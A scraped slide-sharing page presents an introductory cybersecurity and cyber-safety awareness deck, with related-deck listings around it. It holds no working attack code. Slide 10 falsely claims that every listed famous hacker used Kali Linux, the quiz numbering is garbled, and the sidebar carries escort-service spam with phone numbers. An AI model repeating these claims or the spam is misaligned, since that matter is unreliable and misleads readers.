Cybersecurity Basics - Aravindr.comCybersecurity Basics - Aravindr.com
Cybersecurity Basics - Aravindr.com
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber Security Introduction.pptx
Cyber Security Introduction.pptxCyber Security Introduction.pptx
Cyber Security Introduction.pptx
 
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
Cybersecurity Tools | Popular Tools for Cybersecurity Threats | Cybersecurity...
 
information security awareness course
information security awareness courseinformation security awareness course
information security awareness course
 
Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...Application Security | Application Security Tutorial | Cyber Security Certifi...
Application Security | Application Security Tutorial | Cyber Security Certifi...
 

Semelhante a Cyber Security and Penetration Testing Skills Introduction (40

Lec 1- Intro to cyber security and recommendations
Lec 1- Intro to cyber security and recommendationsLec 1- Intro to cyber security and recommendations
Lec 1- Intro to cyber security and recommendationsBilalMehmood44
 
Security & control in management information system
Security & control in management information systemSecurity & control in management information system
Security & control in management information systemOnline
 
Security (IM).ppt
Security (IM).pptSecurity (IM).ppt
Security (IM).pptGooglePay16
 
Network security and firewalls
Network security and firewallsNetwork security and firewalls
Network security and firewallsMurali Mohan
 
Webinar - Reducing the Risk of a Cyber Attack on Utilities
Webinar - Reducing the Risk of a Cyber Attack on UtilitiesWebinar - Reducing the Risk of a Cyber Attack on Utilities
Webinar - Reducing the Risk of a Cyber Attack on UtilitiesWPICPE
 
Cybersecurity.pptx
Cybersecurity.pptxCybersecurity.pptx
Cybersecurity.pptxJohn Donahue
 
Cyber security and its controls.pptx
Cyber security and its controls.pptxCyber security and its controls.pptx
Cyber security and its controls.pptxsrikmhh
 
Cyber Security and Data Privacy in Information Systems.pptx
Cyber Security and Data Privacy in Information Systems.pptxCyber Security and Data Privacy in Information Systems.pptx
Cyber Security and Data Privacy in Information Systems.pptxRoshni814224
 
ComResource Agency Solutions
ComResource Agency SolutionsComResource Agency Solutions
ComResource Agency SolutionsAnthony Dials
 
Cyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat LandscapeCyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat LandscapeAaron White
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security BasicsMohan Jadhav
 

Semelhante a Cyber Security and Penetration Testing Skills Introduction (40 (20)

Lec 1- Intro to cyber security and recommendations
Lec 1- Intro to cyber security and recommendationsLec 1- Intro to cyber security and recommendations
Lec 1- Intro to cyber security and recommendations
 
Unit 1.pptx
Unit 1.pptxUnit 1.pptx
Unit 1.pptx
 
Security & control in management information system
Security & control in management information systemSecurity & control in management information system
Security & control in management information system
 
Security and Control.ppt
Security and Control.pptSecurity and Control.ppt
Security and Control.ppt
 
Careers in Cyber Security
Careers in Cyber SecurityCareers in Cyber Security
Careers in Cyber Security
 
M1_Introduction_IPS.pptx
M1_Introduction_IPS.pptxM1_Introduction_IPS.pptx
M1_Introduction_IPS.pptx
 
cscnapd.ppt
cscnapd.pptcscnapd.ppt
cscnapd.ppt
 
Security (IM).ppt
Security (IM).pptSecurity (IM).ppt
Security (IM).ppt
 
Network security and firewalls
Network security and firewallsNetwork security and firewalls
Network security and firewalls
 
Vulenerability Management.pptx
Vulenerability Management.pptxVulenerability Management.pptx
Vulenerability Management.pptx
 
Cyber security
Cyber securityCyber security
Cyber security
 
Webinar - Reducing the Risk of a Cyber Attack on Utilities
Webinar - Reducing the Risk of a Cyber Attack on UtilitiesWebinar - Reducing the Risk of a Cyber Attack on Utilities
Webinar - Reducing the Risk of a Cyber Attack on Utilities
 
Managing security threats in today’s enterprise
Managing security threats in today’s enterpriseManaging security threats in today’s enterprise
Managing security threats in today’s enterprise
 
Cybersecurity.pptx
Cybersecurity.pptxCybersecurity.pptx
Cybersecurity.pptx
 
Cyber security and its controls.pptx
Cyber security and its controls.pptxCyber security and its controls.pptx
Cyber security and its controls.pptx
 
Cyber Security and Data Privacy in Information Systems.pptx
Cyber Security and Data Privacy in Information Systems.pptxCyber Security and Data Privacy in Information Systems.pptx
Cyber Security and Data Privacy in Information Systems.pptx
 
File000119
File000119File000119
File000119
 
ComResource Agency Solutions
ComResource Agency SolutionsComResource Agency Solutions
ComResource Agency Solutions
 
Cyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat LandscapeCyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat Landscape
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 

Último

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 

Último (20)

Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 

Cyber Security and Penetration Testing Skills Introduction (40

  • 1. Cyber Security and Penetration Testing Introduction Skills
  • 2. Definition cybersecurity: “The vulnerability of any computing system, software program, or critical infrastructure to, or their ability to resist, intentional interference, compromise, or incapacitation through the misuse of, or by unauthorized means of, the Internet, public or private telecommunications systems or other similar conduct that violates Federal, State, or international law, that harms interstate commerce of the United States, or that threatens public health or safety.” ComputerTrainingWales–CyberSecurity
  • 3. Glossary “The term cybersecurity infrastructure includes-- (A) equipment that is integral to research and education capabilities in cybersecurity, including, but not limited to-- (i) encryption devices; (ii) network switches; (iii) routers; (iv) firewalls; (v) wireless networking gear; (vi) protocol analyzers; (vii) file servers; (viii) workstations; (ix) biometric tools; and (x) computers; and (B) technology support staff (including graduate students) that is integral to research and education capabilities in cybersecurity.” ComputerTrainingWales–CyberSecurity
  • 4. One way to think about it cybersecurity = security of information systems and networks in the face of attacks, accidents and failures with the goal of protecting operations and assets ComputerTrainingWales–CyberSecurity
  • 5. In Context corporate cybersecurity = availability, integrity and secrecy of information systems and networks in the face of attacks, accidents and failures with the goal of protecting a corporation’s operations and assets national cybersecurity = availability, integrity and secrecy of the information systems and networks in the face of attacks, accidents and failures with the goal of protecting a nation’s operations and assets ComputerTrainingWales–CyberSecurity
  • 6. In Context ComputerTrainingWales–CyberSecurity • Quiz: A hacked computer can be used to… (select all that apply) • a) Record keystrokes and steal passwords. • b) Send spam and phishing emails. • c) Harvest and sell email addresses and passwords. • d) Access restricted or personal information on your computer • or other systems that you have access to. • e) Infect other systems. • f) Hide programs that launch attacks on other computers. • g) Illegally distribute music, movies and software. • h) Generate large volumes of traffic, slowing down the entire system.
  • 7. Cybersecurity as a Discipline How to achieve cybersecurity “success”? How to overcome the cybersecurity problem? Must understand four factors that play into the cybersecurity equation:  Technology  Economics (of stakeholders and incentives)  Social Influences (e.g. Big Brother fears)  Public Policy ComputerTrainingWales–CyberSecurity
  • 8. • Cyber Security Highlights.  User Accounts.  Baseline Configurations.  Configuration Management.  Contingency Plans and Backups.  Mobile Devices and Portable Storage.  Login Banners.  Physical Security.  Sensitive and Personally Identifiable Information (PII). • Network and Internet Access. • Appropriate Use. • Computer Software Licenses. • Cyber Security Incidents. • Cyber Attack. • Social Engineering and Internet Safety. ComputerTrainingWales–CyberSecurity
  • 9. Hackers: Breaches • Headlines  GM 2015: Many use same passwords, spear phishing campaigns, blackmail targets  Twitter: 32 Million  Yahoo: 500 Million (LinkedIn, Amazon, Facebook, Credit Cards, )  Security cameras, breachable appliances, access control systems  Malware found on all platforms including Apple  2 million new signatures of malware in July 2016 ComputerTrainingWales–CyberSecurity
  • 10. Famous Computer Hackers • Gary McKinnon. ... • LulzSec. ... • Adrian Lamo. ... • Mathew Bevan and Richard Pryce. ... • Jonathan James. ... • Kevin Poulsen. ... • Kevin Mitnick. ... • Anonymous. They all have one thing in common, they all use(d) Linux/Kali Linux to carryout their attacks. ComputerTrainingWales–CyberSecurity
  • 11. Cyber Security Threats for 2017 • Ransomware and Extortion will increase (Stephen Gates, NSFocus) • Industrial IoT attacks will increase (Adam Meyer, SurfWatch) • Internal Threats will increase (James Maude, Avetco) • Physical Security Investments (Ed Solis, CommScope) • Hackers are in the Long Game ComputerTrainingWales–CyberSecurity
  • 12. Attack Vectors • Hacking (Data theft, corporate espionage, identity theft) • Social Engineering (Spear Phishing, Phishing, traditional SE) • Internal attacks: Unauthorised access and access control • Cloud Attacks and Breaches (Dropbox, iCloud, OneDrive, Etc.) • Virus/Malware/Botnet • Ransomware and Extortion ComputerTrainingWales–CyberSecurity
  • 13. Legacy Gateway Security Implementation ComputerTrainingWales–CyberSecurity
  • 15. Cyber Security Focus •Keeping the Bad Guys out • Protecting your Internal Network •Recovering from an Attack ComputerTrainingWales–CyberSecurity
  • 16. Business Security: Keep the bad guys out • Tools  Modern firewall  Security Event Manager  Spam Filter  Kali Linux • Policy  Monitor 24x7  Security Event and Log Review  No local Admins!  Patch Management and Passwords (2 Form Factor) ComputerTrainingWales–CyberSecurity
  • 17. External Threat Strategy • Raise the bar higher than the next guy • Weigh what you automate with what you control through policy and procedure • Higher priced experts in most cases are cheaper than the alternatives • Constant education on the latest threats must be a priority. The best defense is intelligence. ComputerTrainingWales–CyberSecurity
  • 18. Business Security: Protect from the Inside • Tools  Anti-virus, Anti-Malware  Security Event Manager  Modern Firewall  Reverse Spam Filter  Network Design: Zones • Policy  Employee Training  Data Retention, Email Security, Data Access and Access Control policies  Employee Turnover  Device Management ComputerTrainingWales–CyberSecurity
  • 19. Importance of Training • Free Wifi: Device called wifi pineapple mimics popular banking websites. • Middleman attack • Pass through pineapple to whatever sites they want and capture user names and passwords. Slowly add botnets, malware and virus. • USB drives “dropped” 30 drives, 67 different networks including corporate networks • Waterhole attacks: redirect to compromised websites • Spear Phishing: Cost one firm $47 million (CEO email wire transfer) ComputerTrainingWales–CyberSecurity
  • 20. Business Security: Attack Recovery • Tools  Backup, Disaster Recovery and Business Continuity  Cyber Security Insurance • Policy  Communication Plan  Recovery Time Objective  Recovery Point Objective  Incident Source Identification and Quarantine  Test, Test, Test ComputerTrainingWales–CyberSecurity
  • 21. Recovery Considerations • Attack Source Discovery: 5 minutes to 8 hours • Systems Restoration: 20 minutes to 2 weeks • Data Loss: 15 minutes to 24 hours • Put a real cost to the business loss to truly understand the impact  Salary  Missed sales  Lost data  Project delays and associated opportunity cost ComputerTrainingWales–CyberSecurity
  • 22. Firewall Evolution • Packet Inspection: Traffic cop: Can see car, colour, plate, make and model and which direction it is coming from but cant see who is driving, what is in the boot, what is underneath the car • Deep Packet Inspection: X-ray vision. Much better than Packet Inspections but even Superman can’t see through lead • Encrypted traffic: https traffic is major cause of most breaches. Google prioritises search results to list https. Ransomware Cryptolocker uses this to explode on a network via webmail • Firewall purchased in the past 18-36 months may not be able to inspect https traffic ComputerTrainingWales–CyberSecurity
  • 23. Security Quick Tips • Move DNS to trusted DNS source only • Restrict outbound VPN connection to trusted users (Ransomeware Call Home) • Block outbound SMTP (Botnet Zombies) • Restrict outbound SSH connectivity (Remote access Trojan) • Restrict download of executable files to admins and trusted users • Inspect encrypted traffic • Two factor authentication for remote users • Block illicit applications (proxy bypass, peer to peer, tor, etc.) • Automate alerts and review network traffic frequently ComputerTrainingWales–CyberSecurity
  • 24. Roles and Responsibilities • Users.  Follow security procedures, report security problems, and complete required computer security training. • Privileged Users.  Administer their own systems, including patch and configuration management. • Group Administrators.  Manage computers and implement the cyber security program within their group. • Assistant Cyber Security Managers (ACSM).  Program point of contact.  Implement the cyber security program within their program. • Cyber Security Team.  Manage day-to-day operation of the cyber security program. • Directors / Associate Directors.  Responsible for the Laboratory’s cyber security program.  Establish the program’s overall goals, objectives and priorities. ComputerTrainingWales–CyberSecurity
  • 25. 25 Viruses Viruses infect computers through email attachments and file sharing. They delete files, attack other computers, and make your computer run slowly. One infected computer can cause problems for all computers on a network. Hackers Hackers are people who “trespass” into your computer from a remote location. They may use your computer to send spam or viruses, host a Web site, or do other activities that cause computer malfunctions. Identity Thieves People who obtain unauthorized access to your personal information, such as Social Security and financial account numbers. They then use this information to commit crimes such as fraud or theft. Spyware Spyware is software that “piggybacks” on programs you download, gathers information about your online habits, and transmits personal information without your knowledge. It may also cause a wide range of other computer malfunctions. Llet’s talk about some common cyber-safety threats and the problems they can cause . . . ComputerTrainingWales–CyberSecurity
  • 26. TOP SEVEN CYBER-SAFETY ACTIONS 26 1. Install OS/Software Updates 2. Run Anti-virus Software 3. Prevent Identity Theft 4. Turn on Personal Firewalls 5. Avoid Spyware/Adware 7. Back up Important Files 6. Protect Passwords ComputerTrainingWales–CyberSecurity
  • 27. RUN ANTI-VIRUS SOFTWARE 27  To avoid computer problems caused by viruses, install and run an anti-virus program like Sophos/Malwarebytes.  Periodically, check to see if your anti-virus is up to date by opening your anti-virus program and checking the Last updated: date.  Anti-virus software removes viruses, quarantines and repairs infected files, and can help prevent future viruses. ComputerTrainingWales–CyberSecurity
  • 28. PREVENT IDENTITY THEFT 28  Don't give out financial account numbers, drives license numbers or other personal identity information unless you know exactly who's receiving it. Protect others people’s information as you would your own.  Never send personal or confidential information via email or instant messages as these can be easily intercepted.  Beware of phishing scams - a form of fraud that uses email messages that appear to be from a reputable business (often a financial institution) in an attempt to gain personal or account information. These often do not include a personal salutation. Never enter personal information into an online form you accessed via a link in an email you were not expecting. Legitimate businesses will not ask for personal information online. ComputerTrainingWales–CyberSecurity
  • 29. TURN ON PERSONAL FIREWALLS  Check your computer security settings for a built-in personal firewall. If you have one, turn it on. Microsoft Vista and Mac OSX have built-in firewalls. For more information, see:  Mac Firewall (docs.info.apple.com/article.html?path=Mac/10.4/en/mh1042.html)  Microsoft Firewall (www.microsoft.com/windowsxp/using/networking/security/winfirewall.mspx)  Unix users should consult system documentation or online help for personal firewall instructions and/or recommendations.  Once your firewall is turned on, test your firewall for open ports that could allow in viruses and hackers. Firewall scanners like the one on http://www.auditmypc.com/firewall- test.asp simplify this process.  Firewalls act as protective barriers between computers and the internet.  Hackers search the Internet by sending out pings (calls) to random computers and wait for responses. Firewalls prevent your computer from responding to these calls. 29 ComputerTrainingWales–CyberSecurity
  • 30. AVOID SPYWARE/ADWARE 30  Spyware and adware take up memory and can slow down your computer or cause other problems.  Use Spybot and Ad-Aware to remove spyware/adware from your computer.  Watch for allusions to spyware and adware in user agreements before installing free software programs.  Be wary of invitations to download software from unknown internet sources. ComputerTrainingWales–CyberSecurity
  • 31. PROTECT PASSWORDS 31  Do not share your passwords, and always make new passwords difficult to guess by avoiding dictionary words, and mixing letters, numbers and punctuation.  Do not use one of these common passwords or any variation of them: qwerty1, abc123, letmein, password1, iloveyou1, (yourname1), baseball1.  Change your passwords periodically.  When choosing a password: o Mix upper and lower case letters o Use a minimum of 8 characters o Use mnemonics to help you remember a difficult password  Store passwords in a safe place. Consider using KeePass Password Safe (http://keepass.info/), Keychain (Mac) or an encrypted USB drive to store passwords. Avoid keeping passwords on a Post-it under your keyboard, on your monitor or in a drawer near your computer! ComputerTrainingWales–CyberSecurity
  • 32. BACK UP IMPORTANT FILES  Reduce your risk of losing important files to a virus, computer crash, theft or disaster by creating back-up copies.  Keep your critical files in one place on your computer’s hard drive so you can easily create a back up copy.  Save copies of your important documents and files to a CD, online back up service, flash or USB drive, or a server.  Store your back-up media in a secure place away from your computer, in case of fire or theft.  Test your back up media periodically to make sure the files are accessible and readable. 32 ComputerTrainingWales–CyberSecurity
  • 33. CYBER-SAFETY AT HOME  Physically secure your computer by using security cables and locking doors and windows in the dorms and off-campus housing.  Avoid leaving your laptop unsupervised and in plain view in the library or coffee house, or in your car, dorm room or home.  Set up a user account and password to prevent unauthorized access to your computer files.  Do not install unnecessary programs on your computer.  Microsoft users can download the free Secunia Personal Software Inspector (https://psi.secunia.com/), which lets you scan your computer for any missing operating system or software patches and provides instructions for getting all the latest updates. 33 ComputerTrainingWales–CyberSecurity
  • 34. CYBER-SAFETY AT WORK  Be sure to work with your technical support coordinator before implementing new cyber-safety measures.  Talk with your technical support coordinator about what cyber-safety measures are in place in your department.  Report to your supervisor any cyber-safety policy violations, security flaws/weaknesses you discover or any suspicious activity by unauthorized individuals in your work area.  Physically secure your computer by using security cables and locking building/office doors and windows.  Do not install unnecessary programs on your work computer. 34 ComputerTrainingWales–CyberSecurity
  • 35. CYBER-SAFETY BASICS QUICK QUIZ 1. True or False? Viruses can be transmitted via email, email attachments or IM. 2. People who seek out your personal information and then use it to commit crimes are called:_____________________ 3. Which of the following are ways to help prevent identity theft. (Check all that apply.) __A. Never send personal information via email or instant messages. __B. Always send personal information via email or instant messages. __C. Lock my office door. __D. Don’t tell anybody my name. 4. True or False? Iloveyou2 is a good password. Why or why not? 5. I just downloaded a free program online and now my computer is running very, very slowly. Which of the following most likely happened? __A. I didn’t install the program properly. __B. I didn’t have enough space on my hard drive for the new program. __C. I downloaded spyware and/or adware, too. __D. Someone snuck in while the program was downloading and changed my password. 6. ___________________help prevent your computer from responding to pings (calls) from hackers. 8. To fix problems with my operating system and/or application software, I should install __________________. 35 ComputerTrainingWales–CyberSecurity
  • 36. QUICK QUIZ ANSWERS 1. True 2. Identity thieves 3. A and C are correct. D would probably help too, but seems a bit extreme! 4. False. Iloveyou2 is a very common password. 5. C. It’s most likely that you downloaded spyware and/or adware. 6. Firewalls 7. OS and/or software updates (patches) 36 ComputerTrainingWales–CyberSecurity
  • 37. User Accounts • Central accounts through the IS office provide access to:  Workstations.  E-mail (including webmail).  Remote connectivity (VPN, SSH, modem/dialup).  Central services (Central File Services, administrative applications, web publishing, etc.). • Passwords are keys to computing resources, just as door keys are for facilities. • Different passwords should be used to access Internet resources (i.e. an ISU or hotmail account). To facilitate this, the use of a cryptographic password safe is recommended (see http://passwordsafe.sourceforge.net/). • The DOE requires that passwords:  Be at least 8 characters long.  Not be based on the username or a dictionary word.  Be changed every 180 days, or when a compromise is suspected.  Contain mixed case, symbols, and digits.  Contain a nonnumeric character in the first and last position. ComputerTrainingWales–CyberSecurity
  • 38. Configuration Management • Users are responsible for ensuring that changes to the system do not diminish security and that changes to the system are reflected in system documentation. • Examples of risky system changes include:  Installing third party software.  Providing physical system access to others.  Installing or configuring hardware devices. ComputerTrainingWales–CyberSecurity
  • 39. Contingency Plans and Backups • Contingency Plans.  Users should document the procedures, equipment, and personnel necessary to recover computing capabilities and data in the event that computer system operations are disrupted.  Significant computing resources should have a written contingency plan including:  System backup details.  System recovery checklist/guide.  Key personnel.  System configuration data such as key applications and configuration settings. • Backups.  Backups are critical to contingency preparedness. Backups should:  Be stored securely.  Be periodically tested for usability.  Be documented (what is backed up, the backup schedule, and the data recovery procedures).  It is important to differentiate data which should be backed up from data considered temporary, or an acceptable loss. ComputerTrainingWales–CyberSecurity
  • 40. Mobile Device and Portable Storage • Users of mobile devices (e.g. laptops, PDAs) and portable media (e.g. USB keys) are responsible for the security of these devices when used in other environments. Users are encouraged to:  Make complete backups of data prior to travel,  Utilize central imaging and scanning facilities for laptops and removable media,  Keep laptops within sight at all times during travel,  Be aware of the physical and network environment when using the laptop or sending information over untrusted networks. • Pre-verified USB keys are available from the storeroom for purchase. Use of other USB keys is also permitted with approval on a case-by-case basis. A USB scanning station is available in the IS office. • Moderate data must be encrypted if stored on mobile devices or portable storage. ComputerTrainingWales–CyberSecurity
  • 41. Cyber Attack • How to Recognise a Cyber Attack  Signs indicating a computer system is under attack may include:  Unusually sluggish or non-responsive applications.  Unexpected changes in system behavior.  Persistent pop-up messages.  Missing or corrupt data. • How to Prevent a Cyber Attack  Use plug-ins to block ads (Ad-Block Plus).  Use GPG for sender verification with e-mail.  Ensure anti-virus is turned on. ComputerTrainingWales–CyberSecurity
  • 42. Social Engineering and Internet Safety • Web.  Avoid ‘high-risk’ sites: gambling, pornography, ‘ad-supported’, etc.  Read prompts and pop-ups; understand what you click (use google to search for information).  Never use your company password with Internet servers. • E-Mail.  Phishing attacks and other forms of social engineering are also cyber attacks. Unexpected e-mails or phone calls, unsolicited CVs, resumes, or requests for information  Any publicly available information may be used to make a message appear legitimate, including:  Logos.  personal e-mail addresses.  official documents. ComputerTrainingWales–CyberSecurity
  • 43. Trojan Horse Attack Trojan Horse arrives via email or software like free games. Trojan Horse is activated when the software or attachment is executed. Trojan Horse releases virus, monitors computer activity, installs backdoor, or transmits information to hacker. ComputerTrainingWales–CyberSecurity
  • 44. Denial of Service Attacks In a denial of service attack, a hacker compromises a system and uses that system to attack the target computer, flooding it with more requests for services than the target can handle. In a distributed denial of service attack, hundreds of computers (known as a zombies) are compromised, loaded with DOS attack software and then remotely activated by the hacker. ComputerTrainingWales–CyberSecurity
  • 45. Spamming Attacks •Sending out e-mail messages in bulk. It’s electronic “junk mail.” •Spamming can leave the information system vulnerable to overload. •Less destructive, used extensively for e-marketing purposes. ComputerTrainingWales–CyberSecurity
